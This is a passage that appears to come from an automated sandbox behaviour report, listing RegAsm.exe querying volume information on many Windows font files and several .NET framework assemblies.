Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
